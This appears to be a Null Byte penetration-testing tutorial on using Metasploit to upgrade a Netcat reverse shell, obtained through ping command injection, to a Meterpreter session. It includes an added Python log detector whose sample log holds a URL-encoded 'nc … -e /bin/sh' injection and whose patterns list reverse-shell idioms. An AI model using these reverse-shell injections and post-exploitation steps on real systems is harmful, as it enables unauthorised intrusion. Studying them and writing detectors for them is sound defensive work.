Elevating a Common Shell to Meterpreter
Source: https://null-byte.wonderhowto.com
Popping a shell is often the main goal of a hacker, and it can be exciting when executed properly, but plain shells have their limitations. Metasploit's Meterpreter probably needs no introduction, but this powerful, dynamic payload offers a leg up over a normal shell. To prove it, we'll show how to take a normal command shell and elevate it to a Meterpreter session.
Shell vs. Meterpreter
A shell is basically an interface that acts as a shortcut to the commands of an operating system. When it comes to hacking, there are two types of shells that are mainly talked about: bind shells and reverse shells.
A bind shell effectively binds itself to a certain port on the target, and the attacking system connects to that listening port and a session is created. A reverse shell, on the other hand, actively connects from the target machine to the attacking machine, where a listener is waiting for incoming connections.
Command shells provide a great way to really dig into the target, but they are not always the best option. Usually, they are constrained to the privileges of the process that spawned them, so the power that comes with root-level access isn't always available.
Meterpreter allows us to run post-exploitation modules and privilege escalation exploits locally on the target. It uses encrypted communication, and nothing is written to disk during operation, making it a suitable weapon that leaves little to no evidence behind. Note that running in memory only limits disk artifacts: the session is still visible as an outbound network connection and as injected code in process memory, which is where defenders typically catch it. Meterpreter offers a ton of other features and is highly extensible, which makes it an excellent addition to any hacker's arsenal.
Step 1: Start a Listener
To get started, fire up Metasploit. Type msfconsole in the terminal and we'll be greeted by a nice little welcome banner after it loads. We'll be using a great feature of Metasploit, which is the ability to set up a universal listener that can handle a wide range of different types of shells. Enter the following to load the module:
Next, we need to specify the listening host and port, using the IP address of our local machine and an arbitrary port number. We also need to set the payload — the versatile reverse TCP shell is an excellent choice here.
Type options at the prompt to verify that our settings are correct.
It looks like we're good to go. Type run to launch the handler, and it's now ready and waiting for an incoming connection.
Step 2: Get Shell with Netcat
Netcat is a powerful networking utility commonly used to troubleshoot connectivity issues, but it can also serve as a backdoor by piping a command shell over a network connection. We can use this tool, coupled with a command injection vulnerability, to spawn a shell and connect back to our local machine. If all goes well, the handler we set up earlier will catch the shell and we'll be able to issue commands.
This vulnerability lets us append system commands to the input for the ping utility.
Here, we've tacked on the Netcat command to spawn a shell and connect to our local machine on port 1234:
After a moment, back in the terminal with our handler, we see that a session is opened up. We can now issue commands like id and uname -a to verify this.
Finally, we need to background this session by pressing Ctrl-Z, followed by Y to confirm.
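From the defender's side, the command injection described in Step 2 leaves a clear trace in the web server's access log: a ping parameter that contains a shell separator followed by a connect-back command. The following detector is an added example (not code from the original article); the log lines it scans are constructed, and the /ping?ip= endpoint and the log format are assumptions.

```python
import re
from typing import Optional
from urllib.parse import unquote_plus

# Constructed sample access-log lines (not from the original page). The third
# line shows the pattern the article describes: a shell separator appended to
# the ping target, followed by a Netcat connect-back to a listener on port 1234.
SAMPLE_LOG = """\
10.0.0.9 - - [10/Oct/2023:12:00:01 +0000] "GET /ping?ip=192.168.1.10 HTTP/1.1" 200 512
10.0.0.9 - - [10/Oct/2023:12:00:05 +0000] "GET /ping?ip=192.168.1.11 HTTP/1.1" 200 498
10.0.0.9 - - [10/Oct/2023:12:00:09 +0000] "GET /ping?ip=127.0.0.1%3Bnc+10.0.0.5+1234+-e+%2Fbin%2Fsh HTTP/1.1" 200 0
"""

# Shell metacharacters that end the intended ping argument and start a new command.
SEPARATORS = re.compile(r"[;&|`$]|\n")
# Idioms commonly used to hand a shell to a remote listener.
REVERSE_SHELL_HINTS = re.compile(
    r"\b(nc|ncat|netcat)\b.*\s-e\s|/dev/tcp/|\bbash\s+-i\b|\bsh\s+-i\b", re.I
)
# Minimal common-log-format parser: source IP, timestamp, request path.
REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(?:GET|POST) (\S+) HTTP/[\d.]+"')


def analyse_request(path: str) -> Optional[dict]:
    """Return a finding if any query parameter carries an injected command."""
    if "?" not in path:
        return None
    # Split on the raw '&' first, so an encoded %26 inside a value is not mistaken
    # for a parameter boundary; then decode each piece.
    for param in path.split("?", 1)[1].split("&"):
        raw_name, _, raw_value = param.partition("=")
        value = unquote_plus(raw_value)
        # A hostname or IP should never contain a shell separator.
        if not SEPARATORS.search(value):
            continue
        severity = "high" if REVERSE_SHELL_HINTS.search(value) else "medium"
        return {"param": unquote_plus(raw_name), "value": value, "severity": severity}
    return None


def scan_log(text: str) -> list:
    """Scan access-log lines and return findings tagged with source IP and time."""
    findings = []
    for line in text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        src, ts, path = m.groups()
        hit = analyse_request(path)
        if hit:
            findings.append({"src": src, "time": ts, **hit})
    return findings


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```

A "high" finding pairs well with a firewall or flow record showing the web server opening an outbound connection to the same port shortly after the request.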
Step 3: Elevate Shell to Meterpreter Session
Now that we have attained a session on the target, we can upgrade that humble shell to a full-fledged Meterpreter session. This will allow for greater flexibility when it comes to interacting with the target.
In order to view any sessions that are currently open, type sessions at the prompt. Below, we can see the session we opened earlier, along with its ID, shell type, and connection information.
The easiest way to transform a regular session into a Meterpreter session is to use the -u flag. Issue the sessions command with the appropriate ID and watch the magic happen.
Now it seems like nothing really happened, but in fact, we've opened a Meterpreter session in the background — it doesn't automatically drop us into it. If we issue the sessions command again, it will list our new Meterpreter session with an ID of 2. We can then use the -i flag to interact with it.
And now we have a Meterpreter shell. However, there is one other way to elevate a normal shell to a Meterpreter session that is similar to the method outlined above, and that is to manually use the shell_to_meterpreter post-exploitation module.
Alternative Way to Elevate Shell to Meterpreter Session
To load it, type the following.
All we have to do is specify the existing session we want to upgrade. After that, just to be sure, we can view the current settings with the options command.
Type run to kick it off.
Again, this opens up the new session in the background, so we have to issue the sessions command to determine the correct ID.
We can see that this new Meterpreter session has an ID of 3. Now we are ready to interact with it.